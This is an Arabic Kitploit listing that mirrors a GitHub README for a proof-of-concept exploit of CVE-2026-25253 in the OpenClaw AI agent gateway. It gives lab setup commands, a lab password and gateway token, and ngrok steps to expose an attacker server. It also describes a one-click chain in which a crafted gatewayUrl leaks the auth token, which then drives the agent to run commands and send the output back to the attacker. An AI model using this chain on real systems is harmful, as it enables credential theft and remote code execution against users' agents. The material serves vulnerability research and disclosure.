Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25253 — إثبات مفهوم استغلال لـ CVE-2026-25253 في OpenClaw: يقوم gatewayUrl مُصمَّم خصيصًا بتسريب رمز بوابة Control UI، مما يتيح وصولًا غير مصرح به إلى البوابة وتنفيذ تعليمات برمجية عن بُعد بنقرة واحدة. | Kitploit
أدوات/GitHubGitHub/yym8538/cve-2026-25253
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتأمن الويباختبار الاختراقالمصادقةالفريق الأحمرأداة الوصول عن بعد
GitHubyym8538/cve-2026-25253

CVE-2026-25253

إثبات مفهوم استغلال لـ CVE-2026-25253 في OpenClaw: يقوم gatewayUrl مُصمَّم خصيصًا بتسريب رمز بوابة Control UI، مما يتيح وصولًا غير مصرح به إلى البوابة وتنفيذ تعليمات برمجية عن بُعد بنقرة واحدة.

1منذ شهر واحدلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click Remote Code Execution PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

الوصف

CVE-2026-25253 : ثغرة تسريب رمز المصادقة في OpenClaw

الوصف: يسمح OpenClaw (المعروف أيضًا باسم clawdbot أو Moltbot) قبل الإصدار v2026.1.29 للمهاجمين بتسريب رمز مصادقة البوابة المخزَّن عبر تمرير قيمة سلسلة استعلام gatewayUrl مُصمَّمة خصيصًا إلى واجهة التحكم (Control UI)، والتي تُنشئ تلقائيًا اتصال WebSocket دون التحقق أو تأكيد المستخدم. قد يؤدي ذلك إلى وصول غير مصرَّح به إلى البوابة وتنفيذ تعليمات برمجية عن بُعد بنقرة واحدة.

المتطلبات

  • Docker (Docker Desktop على Windows)
  • Python 3.x (على جانب المهاجم)

الملفات

  • Dockerfile — لبناء بيئة OpenClaw المصابة بالثغرة
  • templates/ — صفحات الويب الخبيثة المستخدمة في الاستغلال
  • config.txt — إعدادات OpenClaw المستخدمة في بيئة الضحية
  • exploit.py — خادم الاستغلال
  • requirements.txt — متطلبات PoC

إعداد البيئة

  1. بناء صورة Docker
docker build -t openclaw-vuln .
  1. تشغيل البيئة (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. إنشاء نفق SSH
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • كلمة المرور: openclawlab
  1. الوصول إلى واجهة التحكم في OpenClaw افتح الرابط التالي في المتصفح
http://127.0.0.1:18789/
  1. أدخل رمز البوابة d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. انقر على Connect
  3. افتح تبويب Config
  4. الصق محتويات config.txt
  5. استبدل حقل مفتاح API بمفتاح OpenAI API الخاص بك
  6. احفظ الإعدادات
  7. تأكد من استجابة الوكيل (agent) بشكل طبيعي

إثبات المفهوم (PoC)

  1. تثبيت المتطلبات (على جانب المهاجم)
pip3 install -r requirements.txt
  1. كشف خادم الاستغلال عبر HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • انسخ اسم المضيف المُوجَّه (forwarding hostname) الناتج
  1. تشغيل خادم الاستغلال
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

مثال:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. إطلاق الهجوم
  1. افتح الصفحة الخبيثة التي يكشفها خادم الاستغلال
  2. حاكِ تفاعل الضحية مع الصفحة
  3. أطلق مسار الاستغلال من المتصفح

مسار الهجوم

  1. يقوم رابط خبيث بتغيير gatewayUrl في واجهة التحكم لدى الضحية
  2. يتصل المتصفح تلقائيًا بنقطة نهاية WebSocket التي يتحكم بها المهاجم
  3. يتم تسريب رمز مصادقة البوابة إلى المهاجم
  4. تستخدم الصفحة الخبيثة الرمز المسروق لفتح اتصال WebSocket جديد ببوابة OpenClaw المحلية لدى الضحية
  5. يتم إرسال طلب تنفيذ أمر عبر الوكيل (agent)
  6. تُعاد نتيجة التنفيذ إلى خادم المهاجم

النتيجة المتوقعة

  • يُعاد توجيه متصفح الضحية إلى مسار WebSocket الخبيث
  • يتم التقاط رمز مصادقة البوابة بواسطة المهاجم
  • يستطيع المهاجم إرسال طلب تنفيذ أمر عبر OpenClaw
  • يُعاد ناتج الأمر إلى خادم المهاجم

نموذج المخرجات

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

ملاحظات

  • يستهدف هذا PoC الإصدار OpenClaw 2026.1.24-1
  • تعتمد سلسلة الاستغلال على المعالجة المصابة بالثغرة لـ gatewayUrl في واجهة التحكم
  • للوصول إلى الضحية عن بُعد، يجب تقديم الصفحة الخبيثة عبر HTTPS
  • يتم الوصول إلى بوابة OpenClaw المحلية عبر متصفح الضحية كجسر

رؤى EQST

ننشر تحليلاً لثغرات CVE والبرمجيات الخبيثة مرة كل شهر. إذا كنت مهتمًا، يُرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
تنزيل الأداة